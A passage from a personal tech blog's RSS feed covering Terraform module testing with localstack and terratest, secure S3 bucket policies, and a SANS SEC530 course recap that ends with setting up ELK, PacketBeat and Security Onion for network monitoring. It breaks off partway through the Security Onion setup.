&lt;p>All in all, I am quite happy with how this whole story turned out in the end. Despite the issue with the hardcoded API endpoints to the USA region in v1.9.1 of Flink, I managed to implement a simple workaround thanks to the Open Source nature of the project. The result is that we have much better visibility and monitoring implemented for our Flink cluster which makes our lives in the DevOps world much better. I did not write much about it in this post, but once these metrics became available in our Datadog account it was trivial to set up a few Monitors which would alert us if for example one of the 4 Flink jobs were failing. I will leave it up to the reader to imagine how that&amp;rsquo;s done.&lt;/p></description></item><item><title>Testing Terraform Modules</title><link>https://flrnks.netlify.app/post/terraform-testing/</link><pubDate>Sun, 12 Jul 2020 11:11:00 +0000</pubDate><guid>https://flrnks.netlify.app/post/terraform-testing/</guid><description>&lt;h2 id="intro">Intro&lt;/h2>
&lt;p>I first heard of Terraform about a year ago while working on an assignment for a job interview. The learning curve was steep, and I still remember how confused I was about the syntax of HCL, which resembled JSON but was not exactly the same. I also remember hearing about the concept of Terraform Modules, but they were not needed for the assignment, so I skipped them for the time being.&lt;/p>
&lt;p>Fast forward to the present day, and I&amp;rsquo;ve had a good amount of exposure to Terraform Modules at work, where we use them to provision resources on AWS in a standardized and rapid fashion. In order to broaden my knowledge of Terraform Modules, I created an exercise in which I built two TF Modules using version 0.12 of Terraform. In this post I wanted to describe these two Terraform Modules and how I went about testing them to ensure they did what they were meant to.&lt;/p>
&lt;h2 id="what-is-a-terraform-module">What is a Terraform Module&lt;/h2>
&lt;p>According to official
&lt;a href="https://www.terraform.io/docs/configuration/modules.html" target="_blank" rel="noopener">documentation&lt;/a> a Terraform module is simply a container for multiple resources that are defined and used together. Terraform Modules can be embedded in each other to create a hierarchical structure of dependent resources. To define a Terraform Module one needs to create one or more Terraform files that define some input variables, some resources and some outputs. The input variabls are used to control properties of the resources, while the outputs are used to reveal information about the created resources. These are often organized into such structure as follows:&lt;/p>
&lt;ul>
&lt;li>&lt;code>variables.tf&lt;/code> defining the Terraform variables&lt;/li>
&lt;li>&lt;code>main.tf&lt;/code> creating the Terraform resources&lt;/li>
&lt;li>&lt;code>output.tf&lt;/code> listing the Terraform outputs&lt;/li>
&lt;/ul>
&lt;p>Note that the above is just an unenforced convention; it simply makes it easier to get a quick understanding of a Terraform Module. As an example, if an organization needs to have its AWS S3 buckets secured with the same policies to protect its data, it can embed these security policies in a TF Module and then prescribe its use within the organization to enable those security policies automatically. Next up is an example of just that.&lt;/p>
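&lt;p>As a rough illustration of this convention (the resource and variable names below are purely illustrative), a minimal module could look like:&lt;/p>

```hcl
# variables.tf -- inputs controlling the resources
variable "bucket_name" {
  type = string
}

# main.tf -- the resources themselves
resource "aws_s3_bucket" "this" {
  bucket = var.bucket_name
}

# output.tf -- information revealed about the created resources
output "bucket_arn" {
  value = aws_s3_bucket.this.arn
}
```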
&lt;h2 id="the-secure-bucket-tf-module">The Secure-Bucket TF Module&lt;/h2>
&lt;p>The first of the two Terraform Modules is &lt;code>tf-module-s3-bucket&lt;/code>, which can be used to create an S3 bucket in AWS that is secured to a higher degree, so that it may be suitable for storing highly sensitive data. The security features of the bucket consist of:&lt;/p>
&lt;ul>
&lt;li>filtering on Source IPs that can access its contents&lt;/li>
&lt;li>enforcing encryption at rest (KMS) and in transit&lt;/li>
&lt;li>object-level and server access logging enabled&lt;/li>
&lt;li>filtering on IAM principals based on official
&lt;a href="https://aws.amazon.com/blogs/security/how-to-restrict-amazon-s3-bucket-access-to-a-specific-iam-role/" target="_blank" rel="noopener">docs&lt;/a>&lt;/li>
&lt;/ul>
&lt;p>When using this module, one can define a list of IPs and a list of IAM Principals to control who, and from which networks, can access the contents of the bucket. These restrictions are written into the Bucket Policy, which is considered a &lt;code>resource-based policy&lt;/code> that always takes precedence over identity-based policies; so even if an IAM Role has been explicitly granted permission to access the bucket, it does not matter if the bucket&amp;rsquo;s own Bucket Policy denies that access. Below is a good overview of the whole evaluation logic of AWS IAM:&lt;/p>
&lt;p>&lt;img src="static/aws-iam.png" alt="AWS IAM Evaluation Logic">&lt;/p>
&lt;p>In addition, server-access and object-level logging can be enabled as well to improve the bucket&amp;rsquo;s level of auditability. Altogether, these settings can greatly elevate the security of data in the S3 bucket that was created by this module.&lt;/p>
&lt;h2 id="the-s3-authz-tf-module">The S3-AuthZ TF Module&lt;/h2>
&lt;p>This second Terraform Module is called &lt;code>tf-module-s3-auth&lt;/code>, and it was written in part to complement the one used to create an S3 bucket. The aim of this module is to help with the creation of a single IAM policy that can cover the S3 and KMS permissions needed for a given IAM Principal. The motivation behind this module comes from some difficulties I&amp;rsquo;ve faced at work, where some of the IAM Roles we used had too many policies attached. For further reference see the AWS
&lt;a href="https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_iam-quotas.html" target="_blank" rel="noopener">docs&lt;/a> on this.&lt;/p>
&lt;p>The Bucket Policy crafted by the first TF Module allows the definition of a list of IAM Principals that are allowed to interact with the bucket. With this TF module one can actually define the particular S3 actions that those IAM Principals CAN carry out on the data in the bucket. Additionally, this TF module can also be used to allow KMS actions on the KMS keys that protect the data at rest in the bucket.&lt;/p>
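&lt;p>Hypothetically, using such a module could look like the snippet below; the source path, input names and values are invented for illustration, the real ones live in the module&amp;rsquo;s &lt;code>variables.tf&lt;/code>:&lt;/p>

```hcl
module "s3_authz" {
  source        = "./tf-module-s3-auth"
  iam_role_name = "data-pipeline-role"

  # S3 actions the principal is allowed on the bucket's data
  s3_actions = ["s3:GetObject", "s3:PutObject"]

  # KMS actions needed to use the key protecting the data at rest
  kms_actions = ["kms:Decrypt", "kms:GenerateDataKey"]
}
```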
&lt;h2 id="untested-code-is-broken-code">Untested code is broken code&lt;/h2>
&lt;p>With infrastructure-as-code, just as with normal code, testing is often an afterthought. However, it seems to be catching on more and more nowadays. Nothing shows this better than the number of Google search results for &lt;code>Infrastructure as Code testing&lt;/code>: &lt;strong>235.000.000&lt;/strong> as of today (15.8.2020). While Infrastructure as Code is a much broader topic with many other interesting projects, this post will focus solely on Terraform. With Terraform, a good step in the right direction is as simple as running &lt;code>terraform validate&lt;/code>, which can catch silly mistakes and syntax errors and provide feedback such as the following:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-shell" data-lang="shell">Error: Missing required argument
on main.tf line 107, in output &lt;span class="s2">&amp;#34;s3_bucket_name&amp;#34;&lt;/span>:
107: output &lt;span class="s2">&amp;#34;s3_bucket_name&amp;#34;&lt;/span> &lt;span class="o">{&lt;/span>
The argument &lt;span class="s2">&amp;#34;value&amp;#34;&lt;/span> is required, but no definition was found.
&lt;/code>&lt;/pre>&lt;/div>&lt;p>In addition to the &lt;code>terraform validate&lt;/code> option, many IDEs such as IntelliJ, already have plugins that can alert to such issues, so I find myself not using it so often. However, it&amp;rsquo;s still nice to have this feature built into the &lt;code>terraform&lt;/code> executable!&lt;/p>
&lt;p>Once all syntax errors are fixed, testing can continue with the &lt;code>terraform plan&lt;/code> command. This command uses &lt;strong>terraform state&lt;/strong> information (local or remote) to figure out what changes are needed if the configuration is applied, which is truly useful for showing in advance what will be created or destroyed. However, a successful &lt;code>terraform plan&lt;/code> can still result in a failed deployment, because some constraints cannot be verified without making actual API calls to the Cloud Service Provider. The &lt;code>terraform plan&lt;/code> command does not make any real API calls; it only computes the differences that exist between the Terraform code and the Terraform state. The resulting failures are usually very provider-specific.&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-shell" data-lang="shell">data &lt;span class="s2">&amp;#34;aws_iam_policy_document&amp;#34;&lt;/span> &lt;span class="s2">&amp;#34;Deny-Non-CiscoCidr-S3-Access&amp;#34;&lt;/span> &lt;span class="o">{&lt;/span>
statement &lt;span class="o">{&lt;/span>
&lt;span class="nv">sid&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="s2">&amp;#34;Deny-All-S3-Actions-If-Not-In-IP-PrefixList&amp;#34;&lt;/span>
&lt;span class="nv">effect&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="s2">&amp;#34;Deny&amp;#34;&lt;/span>
&lt;span class="nv">actions&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="o">[&lt;/span> &lt;span class="s2">&amp;#34;s3:*&amp;#34;&lt;/span> &lt;span class="o">]&lt;/span>
&lt;span class="nv">resources&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="o">[&lt;/span> &lt;span class="s2">&amp;#34;*&amp;#34;&lt;/span> &lt;span class="o">]&lt;/span>
condition &lt;span class="o">{&lt;/span>
&lt;span class="nb">test&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="s2">&amp;#34;NotIpAddress&amp;#34;&lt;/span>
&lt;span class="nv">variable&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="s2">&amp;#34;aws:SourceIp&amp;#34;&lt;/span>
&lt;span class="nv">values&lt;/span> &lt;span class="o">=&lt;/span> local.ip_prefix_list
&lt;span class="o">}&lt;/span>
&lt;span class="o">}&lt;/span>
&lt;span class="o">}&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>This Terraform Code is syntactically correct nd passes the &lt;code>terraform validate&lt;/code>, and &lt;code>terraform plan&lt;/code> produces a valid plan. However, it still fails at the &lt;code>terraform apply&lt;/code> stage because AWS has a restriction on the &lt;code>sid&lt;/code>: &lt;strong>For IAM policies, basic alphanumeric characters (A-Z,a-z,0-9) are the only allowed characters in the Sid value&lt;/strong>. This constraint is never checked before &lt;code>terraform apply&lt;/code> is called, at which point it is going to fail the whole action with the below error:&lt;/p>
&lt;pre>&lt;code>An error occurred: Statement IDs (SID) must be alpha-numeric. Check that your input satisfies the regular expression [0-9A-Za-z]*
&lt;/code>&lt;/pre>&lt;p>Such types of errors can only be caught when making real API calls to the Cloud Service Provider (or to a truly identical mock of the real API) which will validate the calls and return errors if any are found. Next I will go into some details on how I went about testing the 2 Terraform Modules I wrote.&lt;/p>
&lt;h3 id="manual-testing-via-aws">Manual Testing via AWS&lt;/h3>
&lt;p>The most rudimentary form of testing can be done by setting up a real project that imports and uses the two Terraform modules. This test can be found in my repository&amp;rsquo;s &lt;code>test/terraform/aws/&lt;/code> directory. For this to work properly the AWS provider has to be set up with real credentials, which is beyond the scope of this post. I also opted to use S3 as the TF state backend storage, but this is optional; it can just as well store the state locally in a &lt;code>.tfstate&lt;/code> file.&lt;/p>
&lt;p>First, Terraform has to be initialized via &lt;code>terraform init&lt;/code>, which triggers the download of the AWS Terraform Provider. Next, the changes can be planned and applied via &lt;code>terraform plan&lt;/code> and &lt;code>terraform apply&lt;/code> respectively. It&amp;rsquo;s interesting to note that a complete &lt;code>terraform apply&lt;/code> takes close to 1 minute to complete:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-shell" data-lang="shell">Apply complete! Resources: &lt;span class="m">7&lt;/span> added, &lt;span class="m">0&lt;/span> changed, &lt;span class="m">0&lt;/span> destroyed.
Outputs: &lt;span class="o">[&lt;/span>...&lt;span class="o">]&lt;/span>
real 0m49.090s
user 0m3.532s
sys 0m1.929s
&lt;/code>&lt;/pre>&lt;/div>&lt;p>Once the &lt;code>terraform apply&lt;/code> is complete one can make manual assertions whether it went as expected based on the outputs (if any) and by manually inspecting the resources that were created. While this can be good enough for new setups, it may be not so good when an already deployed project has to be modified and one needs to make sure the changes will not have any undesired side effects.&lt;/p>
&lt;h3 id="manual-testing-via-localstack">Manual Testing via localstack&lt;/h3>
&lt;p>In order to save time (and some costs), one may also consider using &lt;strong>localstack&lt;/strong>, which replicates most of the AWS API and its features to enable faster and easier development and testing. Naturally, it only helps if the infrastructure in question targets AWS. In an earlier
&lt;a href="https://flrnks.netlify.app/post/python-aws-datadog-testing/" target="_blank" rel="noopener">post&lt;/a> I&amp;rsquo;ve already written on how to set it up, so I will not repeat it here. The most important thing is to enable S3, IAM and KMS services in the
&lt;a href="https://github.com/florianakos/terraform-testing/blob/master/test/terraform/localstack/docker-compose.yml" target="_blank" rel="noopener">docker-compose.yaml&lt;/a> by setting this environment variable: &lt;code>SERVICES=s3,kms,iam&lt;/code> so the corresponding API endpoints are turned on.&lt;/p>
&lt;p>The Terraform files I wrote for testing on real AWS can be re-used for testing with localstack with some tweaks; for more detail see the &lt;code>test/terraform/localstack/&lt;/code> folder in my repository. Then it&amp;rsquo;s just a matter of running &lt;code>terraform init&lt;/code> followed by &lt;code>terraform plan&lt;/code> and &lt;code>apply&lt;/code> to create the fake resources in localstack.&lt;/p>
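&lt;p>The main tweak is pointing the AWS provider at the localstack endpoints. A sketch of what that could look like (the ports follow the older localstack defaults where each service had its own port; newer versions expose everything on a single edge port, 4566):&lt;/p>

```hcl
provider "aws" {
  region     = "eu-central-1"
  access_key = "test" # localstack accepts dummy credentials
  secret_key = "test"

  # Skip checks that would require the real AWS API
  skip_credentials_validation = true
  skip_requesting_account_id  = true
  s3_force_path_style         = true

  endpoints {
    s3  = "http://localhost:4572"
    iam = "http://localhost:4593"
    kms = "http://localhost:4599"
  }
}
```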
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-shell" data-lang="shell">Apply complete! Resources: &lt;span class="m">7&lt;/span> added, &lt;span class="m">0&lt;/span> changed, &lt;span class="m">0&lt;/span> destroyed.
Outputs: &lt;span class="o">[&lt;/span> ... &lt;span class="o">]&lt;/span>
real 0m11.649s
user 0m3.589s
sys 0m1.580s
&lt;/code>&lt;/pre>&lt;/div>&lt;p>Notice that this time the &lt;code>terraform apply&lt;/code> took only about 10 seconds, which is considerably faster than using the real AWS API.&lt;/p>
&lt;h3 id="automating-tests-via-terratest">Automating tests via Terratest&lt;/h3>
&lt;p>As I&amp;rsquo;ve shown, running tests via Localstack can be much faster on average, but sometimes a project may require the use of some AWS services that are not supported by Localstack. In this case it becomes necessary to run tests against the real AWS API. For such situations I recommend &lt;code>terratest&lt;/code> from
&lt;a href="https://terratest.gruntwork.io/" target="_blank" rel="noopener">Gruntwork.io&lt;/a>, which is a Go library that provides capabilities to automate tests.&lt;/p>
&lt;p>It still requires a terraform project to be set up, as described in &lt;code>Manual Testing via AWS&lt;/code>; however, having the ability to formally define and verify tests can greatly increase the confidence that the code being tested will function the way it&amp;rsquo;s supposed to. In my test I implemented some assertions on the output values of the &lt;code>terraform apply&lt;/code>, as well as on the existence of the S3 bucket that was just created. In addition, the Go library also provides ways to verify the AWS infrastructure setup by making HTTP calls or SSH connections. This can be a pretty powerful tool.&lt;/p>
&lt;p>This &lt;code>terratest&lt;/code> setup can be found in my repo under
&lt;a href="https://github.com/florianakos/terraform-testing/blob/master/test/go/terraform_test.go" target="_blank" rel="noopener">test/go/terraform_test.go&lt;/a>.&lt;/p>
&lt;p>Running this test takes considerably longer than either of the two previous approaches, but the advantage is that it can be easily automated and integrated into a CI/CD build, where it can verify on demand that the TF code still works as intended even after changes are made.&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-shell" data-lang="shell">▶ go &lt;span class="nb">test&lt;/span>
TestTerraform 2020-08-09T21:46:22+02:00 logger.go:66: Terraform has been successfully initialized!
...
TestTerraform 2020-08-09T21:47:30+02:00 logger.go:66: Apply complete! Resources: &lt;span class="m">7&lt;/span> added, &lt;span class="m">0&lt;/span> changed, &lt;span class="m">0&lt;/span> destroyed.
...
TestTerraform 2020-08-09T21:48:08+02:00 logger.go:66: Destroy complete! Resources: &lt;span class="m">7&lt;/span> destroyed.
...
PASS
ok github.com/florianakos/terraform-testing/tests 116.670s
&lt;/code>&lt;/pre>&lt;/div>&lt;p>The basic idea of &lt;code>terratest&lt;/code> is to automate the process or creation and cleanup of resources for the purposes of tests. To avoid name clashes with existing AWS resources, it&amp;rsquo;s a good practice to append some random strings to resource names as part of the test, so they are not going to fail due to unique name constraints.&lt;/p>
&lt;h2 id="conclusion">Conclusion&lt;/h2>
&lt;p>In this post I have shown what options are available for testing a Terraform Module in local or remote settings. If one only works with AWS services then Localstack can be a great tool for quick local tests during development, while &lt;strong>terratest&lt;/strong> from Gruntwork can be a great help with codifying and automating such tests that run against the real AWS Cloud from your favourite CI/CD setup.&lt;/p></description></item><item><title>Defensible Security Architecture</title><link>https://flrnks.netlify.app/post/sans-sec530/</link><pubDate>Wed, 22 Apr 2020 11:11:00 +0000</pubDate><guid>https://flrnks.netlify.app/post/sans-sec530/</guid><description>&lt;p>In this post I wanted to write about my experience with #SEC530 which is a SANS course that I took in March during the
&lt;a href="https://www.sans.org/event/prague-march-2020/" target="_blank" rel="noopener">SANS Prague&lt;/a> event. Not long ago I wrote another
&lt;a href="https://flrnks.netlify.app/post/sans-netwars/">post&lt;/a> about my experience with NetWars in March, now I wanted to write about the infosec course that started it all.&lt;/p>
&lt;h2 id="defensible-security-architecture---sec530">Defensible Security Architecture - SEC530&lt;/h2>
&lt;p>Initially I was hesitant to register for an advanced level SANS course (5xx in the code). As I had no previous experience with SANS I did not know if an advanced infosec course would be too difficult for me. Luckily, I found a GIAC assessment exam online called &lt;strong>SANS Cybertalent Assessment Exam&lt;/strong>, which I took for free and eventually passed with a score of 93.33%. This made me confident in registering for #SEC530, as the assessment results stated:&lt;/p>
&lt;p>&lt;em>&amp;ldquo;Examinees who score in this range have demonstrated reliable knowledge in core information security principles [&amp;hellip;] they are typically ready for advanced security training&amp;rdquo;&lt;/em>.&lt;/p>
&lt;p>&lt;img src="cybertalent.png" alt="cyber-talent-assessment">&lt;/p>
&lt;h2 id="course-experience">Course Experience&lt;/h2>
&lt;h3 id="day-1">Day 1&lt;/h3>
&lt;p>The course took place at a hotel in Prague 5, about a 10-minute walk from my flat, so I was quite happy about the venue. It was a nice hotel with plenty of room for my course and the others running in parallel, each with a dozen or so attendees:&lt;/p>
&lt;ul>
&lt;li>
&lt;a href="https://www.sans.org/event/prague-march-2020/course/security-essentials-bootcamp-style" target="_blank" rel="noopener">#SEC401&lt;/a> - &lt;strong>Security Essentials Bootcamp Style&lt;/strong>&lt;/li>
&lt;li>
&lt;a href="https://www.sans.org/event/prague-march-2020/course/hacker-techniques-exploits-incident-handling" target="_blank" rel="noopener">#SEC504&lt;/a> - &lt;strong>Hacker Tools, Techniques, Exploits and Incident Handling&lt;/strong>&lt;/li>
&lt;/ul>
&lt;p>Some colleagues were taking #SEC504, but I was the only one from my workplace taking #SEC530. This was nice, because knowing nobody in my class forced me to get to know people, and they all turned out to be interesting! It was also a good opportunity to start recruiting team mates for the NetWars challenge on Day 6!&lt;/p>
&lt;p>Our instructor was Mr.
&lt;a href="https://www.sans.org/instructors/ryan-nicholson" target="_blank" rel="noopener">Ryan Nicholson&lt;/a> from the United States with an interesting career path that led him to become a SANS Instructor. He used to be a Network Administrator in the past and made lots of references to Cisco networking equipment which made me quite nostalgic from time to time &amp;hellip; 😊&lt;/p>
&lt;p>Eventually the course kicked off, and the first day&amp;rsquo;s goal was to get an overview of Defensible Security Architecture. We discussed the downsides of the traditional approach to security and architecture, and how the defensible approach may improve the situation. We were given a recommended reading by Richard Bejtlich titled &lt;strong>The Tao of Network Security Monitoring&lt;/strong>, which contains a really neat definition: &lt;strong>architecture that encourages, rather than frustrates, digital self-defence&lt;/strong>.&lt;/p>
&lt;p>The rest of the day we discussed many interesting topics, including Layer 2 security, which led to a discovery about the WLAN at the hotel: &lt;strong>station isolation&lt;/strong> was not enabled! This wouldn&amp;rsquo;t normally be a huge deal, but then we became aware of some fellow SANS students in the adjacent room taking #SEC504, a red-team course covering topics such as penetration testing. This inspired me to take some action as a blue-teamer, which I hoped would earn me the infamous Red coin for #SEC530&amp;hellip; More on this later in the &lt;code>Blue Team Project&lt;/code> section.&lt;/p>
&lt;h3 id="day-2">Day 2&lt;/h3>
&lt;p>After an interesting first day, we dived right in to the material on the second day, titled &lt;strong>Network Security Architecture and Engineering&lt;/strong>. This day covered many interesting topics in L3 security and provided some interesting lab exercises as well. Most interesting to me was the lab on the config auditing tool called &lt;code>nipper-ng&lt;/code>, which can parse Cisco router/switch config files for security issues and provide actionable recommendations. This surely would have been a nice tool to have back when I worked as a Network Administrator.&lt;/p>
&lt;h3 id="day-3">Day 3&lt;/h3>
&lt;p>We continued the material on the third day with &lt;strong>Network-Centric Security&lt;/strong>, with a bunch of different topics on the menu, such as Next Generation Firewalls (NGFW), &lt;strong>Network Security Monitoring&lt;/strong> (NSM) and Secure Remote Access, just to name a few. Probably the most interesting topic for me was NSM, which involves the passive capture (in-band or out-of-band) and analysis of network flow metadata. This gave me some good ideas for the &lt;code>Blue Team Project&lt;/code> described in a later section.&lt;/p>
&lt;p>After our lunch break, just before we resumed class, someone from the SANS support team came to our classroom and informed us that they decided to convert the class to remote/virtual mode of operation for the rest of the week, as a safety measure against the COVID-19 pandemic. Although it was quite frustrating to me at the time, I now totally agree with their approach to handling this safety concern. Eventually they did an excellent job of converting the class to run via the virtual CyberCast platform on such short notice!&lt;/p>
&lt;h3 id="day-4">Day 4&lt;/h3>
&lt;p>So on the morning of day four, I did not go to the nearby hotel where the first three days had been held; instead I just logged in to my SANS account and accessed the CyberCast session where we continued the course. The teaching duty was split between two new remote instructors from the USA: for the first half of the day we had Mr.
&lt;a href="https://www.sans.org/instructors/greg-scheidel" target="_blank" rel="noopener">Greg Scheidel&lt;/a>, in the afternoon Mr.
&lt;a href="https://www.sans.org/instructors/ismael-valenzuela" target="_blank" rel="noopener">Ismael Valenzuela&lt;/a> took over to finish the rest of the material planned for the day.&lt;/p>
&lt;p>The main theme was &lt;strong>Data Centric Security&lt;/strong> which included topics such as Web Application Firewalls, Data Loss Prevention and some discussions on Cloud Security and containerisation technologies. This last topic was particularly interesting to me, because I had been learning about Docker prior to the SANS training and I had not really considered it from a security point of view before.&lt;/p>
&lt;h3 id="day-5">Day 5&lt;/h3>
&lt;p>This fifth day was dedicated to &lt;strong>Zero Trust Security Architecture&lt;/strong>, which was quite a new and interesting concept to me. During the first half of the day we covered the basic principles of Zero Trust (everything is hostile, verify before establishing trust) and how certain techniques such as mutual authentication can help improve security. The second half of the day with Ismael included some interesting topics such as Security Information and Event Management systems (SIEMs) which are indispensable tools for Security Operations Centres (SOC). This section also proved to have some very valuable lab exercises for the NetWars challenge the following day.&lt;/p>
&lt;h3 id="day-6---netwars">Day 6 - NetWars&lt;/h3>
&lt;p>This final day was dedicated to the CTF-style &lt;strong>NetWars Challenge&lt;/strong> that ran for about 6 hours. Three teams were formed amongst the class participants, who competed against each other and against the clock to solve challenge questions testing the concepts taught during the course. I have to say I genuinely enjoyed every second of it. Our team led the scoreboard all the way until the very end, when we got kicked down to 2nd place because we rushed to be first and incurred some penalties for incorrect answers. Regardless of the final result, it was a very valuable experience with tons of fun and learning. For our efforts that earned us 2nd place, we were rewarded with the much coveted blue coin of #SEC530, which &lt;del>will hopefully arrive by FedEx soon&lt;/del> has finally arrived to me in Prague via FedEx &amp;hellip; :)&lt;/p>
&lt;p>&lt;img src="blue-coin.png" alt="bluec-coin">&lt;/p>
&lt;h3 id="blue-team-project">Blue Team Project&lt;/h3>
&lt;p>As I previously mentioned, on the first day we discovered that all attendees at the SANS venue would be sharing a WLAN without &lt;strong>station isolation&lt;/strong>, and this was making me somewhat uncomfortable. Some years ago, in a university course, I had carried out some simple man-in-the-middle (MITM) attacks on shared LAN networks, so I knew it was not too difficult to steal credentials or mount other kinds of malicious attacks, especially when the attacker didn&amp;rsquo;t even have to crack a Wi-Fi password to join the shared WLAN.&lt;/p>
&lt;p>Later I wondered whether the WLAN isolation feature had been disabled on purpose, so that the red-team students in the adjacent room could practice using some of the typical penetration testing tools. Regardless, the vulnerability created by the lack of WLAN isolation gave me the idea to implement some kind of defence system that could monitor and, if possible, alert me to any seemingly malicious attempts targeting my machine.&lt;/p>
&lt;p>My first idea was to run a packet capture on my host OS via Wireshark, but of course that would have been very difficult to manage and quite likely not very effective! I would&amp;rsquo;ve had to keep an eye on it constantly and check for suspicious packets manually using filters.&lt;/p>
&lt;p>Instead, I took some inspiration from one of the lab exercises with the ELK stack, where we had to look for suspicious log entries from various sources of security telemetry. I decided to set up a similar set of services to run non-stop on my #SEC530 virtual machine. To provide the network metadata I needed, I installed
&lt;a href="https://www.elastic.co/beats/packetbeat" target="_blank" rel="noopener">PacketBeat&lt;/a> and configured it to extract and forward &lt;strong>netflow&lt;/strong> data to the ELK stack. This way I could obtain the necessary visibility into the network activity on my virtual machine, without the need to do full packet capture with Wireshark!&lt;/p>
&lt;p>With the below steps one can run the ELK stack via docker-compose in the #SEC530 VM:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="c1"># ELK stack setup&lt;/span>
mkdir monitor &lt;span class="o">&amp;amp;&amp;amp;&lt;/span> &lt;span class="nb">cd&lt;/span> monitor
cp /labs/1.3/docker-compose.yml ./
sed -i &lt;span class="s1">&amp;#39;17,18 s/^/#/&amp;#39;&lt;/span> docker-compose.yml &lt;span class="c1">#comment out some volumes not needed&lt;/span>
sed -i &lt;span class="s1">&amp;#39;s/lab13es/elastic_search/g&amp;#39;&lt;/span> docker-compose.yml
sed -i &lt;span class="s1">&amp;#39;s/kibana13/kibana_dashboard/g&amp;#39;&lt;/span> docker-compose.yml
docker container prune -f
docker-compose up
&lt;/code>&lt;/pre>&lt;/div>&lt;p>Next I installed and configured the OSS version of PacketBeat:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="c1"># PacketBeat setup&lt;/span>
curl -L -O https://artifacts.elastic.co/downloads/beats/packetbeat/packetbeat-oss-7.6.1-amd64.deb
sudo dpkg -i packetbeat-oss-7.6.1-amd64.deb
&lt;span class="nb">echo&lt;/span> &lt;span class="s2">&amp;#34;setup.dashboards.enabled: true&amp;#34;&lt;/span> &lt;span class="p">|&lt;/span> sudo tee -a /etc/packetbeat/packetbeat.yml
sudo packetbeat setup --dashboards
sudo service packetbeat start
&lt;/code>&lt;/pre>&lt;/div>&lt;p>Now, one can test if it&amp;rsquo;s working by generating some network traffic from the VM which should then appear in the Kibana dashboard at &lt;code>http://localhost:5601/app/kibana&lt;/code>.&lt;/p>
&lt;p>&lt;img src="kibana.png" alt="kibana">&lt;/p>
&lt;p>At this point, it becomes possible to observe malicious hacking attempts by focusing on IP addresses from my local IP subnet&amp;hellip; But I was not yet fully satisfied and wanted to take it a bit further.&lt;/p>
&lt;h3 id="blue-team-project---next-level">Blue Team Project - Next Level&lt;/h3>
&lt;p>It was quite nice to see &lt;strong>netflow&lt;/strong> data being exported to the ELK stack in the previous setup, however I was a bit disappointed with the Kibana dashboards that were set up by PacketBeat. Some were completely dysfunctional due to some syntax errors I could not figure out how to fix.&lt;/p>
&lt;p>I spent quite a long time looking for a fix to the Kibana dashboard issues, but eventually I ended up swapping my ELK &amp;amp; PacketBeat setup for a more advanced set of tools:
&lt;a href="https://securityonion.net/" target="_blank" rel="noopener">The Security Onion&lt;/a>! It turns out that it also uses Docker to run the ELK stack behind the scenes. In addition, it includes tools such as &lt;strong>Zeek/Bro&lt;/strong> and &lt;strong>Suricata/Snort&lt;/strong> right out of the box, which we also covered in the course. So cool!&lt;/p>
&lt;p>Setting it all up on the #SEC530 VM was a bit lengthier than my previous setup. First I had to give the underlying VM some additional juice (4 CPUs and at least 8 GB of RAM), and then I followed the installation steps below on a fresh clone of the #SEC530 VM:&lt;/p>
&lt;ul>
&lt;li>
&lt;p>Set the VM NIC mode to bridge (Autodetect) (in VMWare Fusion)&lt;/p>
&lt;/li>
&lt;li>
&lt;p>Boot the VM, log in and change the settings in &lt;strong>Software &amp;amp; Updates&lt;/strong>:&lt;/p>
&lt;ul>
&lt;li>on &lt;strong>Ubuntu Software&lt;/strong> tab check all options except &lt;strong>restricted software&lt;/strong>&lt;/li>
&lt;li>on &lt;strong>Updates&lt;/strong> tab select the first two options&lt;/li>
&lt;li>click &lt;strong>Close&lt;/strong> and then click &lt;strong>Reload&lt;/strong> to fetch the latest updates&lt;/li>
&lt;/ul>
&lt;/li>
&lt;li>
&lt;p>Next run these steps in the Terminal (adapted from
&lt;a href="https://securityonion.readthedocs.io/en/latest/installing-on-ubuntu.html" target="_blank" rel="noopener">here&lt;/a>):&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-shell" data-lang="shell">&lt;span class="nb">echo&lt;/span> &lt;span class="s2">&amp;#34;debconf debconf/frontend select noninteractive&amp;#34;&lt;/span> &lt;span class="p">|&lt;/span> sudo debconf-set-selections
sudo rm -rf /var/lib/apt/lists/*
sudo apt-get update
sudo apt-get -y install software-properties-common
sudo add-apt-repository -y ppa:securityonion/stable
sudo apt-get update
sudo apt-get -y -f -o Dpkg::Options::&lt;span class="o">=&lt;/span>&lt;span class="s2">&amp;#34;--force-overwrite&amp;#34;&lt;/span> install securityonion-all securityonion-onionsalt securityonion-suricata syslog-ng-core
&lt;/code>&lt;/pre>&lt;/div>&lt;/li>
&lt;/ul>
&lt;p>The above steps install necessary dependencies and then create a desktop shortcut called &lt;strong>Setup&lt;/strong> with the Security Onion icon. Double-click it to continue the install process (alternatively issue &lt;code>sudo sosetup&lt;/code> in Terminal):&lt;/p>
&lt;ul>
&lt;li>choose to reconfigure the network interfaces (with DHCP)&lt;/li>
&lt;li>accept the necessary reboot&lt;/li>
&lt;li>trigger the Setup process again to finish the installation&lt;/li>
&lt;li>choose &lt;strong>Evaluation Mode&lt;/strong> when asked&lt;/li>
&lt;li>set up the default username/password used to secure the various dashboards&lt;/li>
&lt;/ul>
&lt;p>Once the setup finishes (it takes a few minutes), it shows several additional popup windows with useful information about Security Onion&amp;rsquo;s functions, while several new desktop icons appear:&lt;/p>
&lt;p>&lt;img src="setup-done.png" alt="install-onion">&lt;/p>
&lt;p>At this point, the setup is complete and you can see the installed services by clicking on the new icons on the Desktop. Most interesting to me was the &lt;strong>Kibana dashboard&lt;/strong> which comes pre-loaded with some amazing features out of the box:&lt;/p>
